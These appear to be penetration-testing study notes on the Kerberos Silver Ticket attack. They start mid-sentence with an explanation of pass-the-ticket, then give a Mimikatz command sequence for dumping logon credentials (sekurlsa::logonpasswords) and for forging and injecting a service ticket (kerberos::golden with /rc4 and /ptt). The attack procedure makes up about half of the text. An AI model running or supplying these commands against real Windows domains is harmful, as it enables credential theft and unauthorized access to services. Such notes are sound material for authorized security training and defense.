Silver Ticket Attack
the overpass the hash technique to acquire a Kerberos TGT, allowing us to authenticate using Kerberos. We can only use the TGT on the machine it was created for, but the TGS potentially offers more flexibility
The Pass the Ticket attack takes advantage of the TGS, which may be exported and re-injected
elsewhere on the network and then used to authenticate to a specific service. In addition, if the
service tickets belong to the current user, then no administrative privileges are required.
So far, this attack does not provide us with any additional access, but it does offer flexibility in
being able to choose which machine to use the ticket from. However, if a service is registered
with a service principal name, this scenario becomes more interesting.
Previously, we demonstrated that we could crack the service account password hash and obtain
the password from the service ticket. This password could then be used to access resources
available to the service account.
However, if the service account is not a local administrator on any servers, we would not be able to perform lateral movement using vectors such as pass the hash or overpass the hash and
therefore, in these cases, we would need to use a different approach.
- whoami /user
to get SID like S-1-5-21-1602875587-2787523311-2599479668-1103
The SID defining the domain is the entire string except the RID at the end ( -1103 )
- Extract hash of the service
- Mimikatz.exe
- privilege::debug
- sekurlsa::logonpasswords
- kerberos::purge to delete existing ticket
- kerberos::list to verify
- kerberos::golden /user:<user> /domain:<domain> /sid:<sid> /target:<fully qualified host name of the service> /service:<service_name>/rc4:<password hash of that service> /ptt
- misc::cmd to launch cmd to verify the success
Reference:
https://www.netwrix.com/silver_ticket_attack_forged_service_tickets.html1650624987.jpg)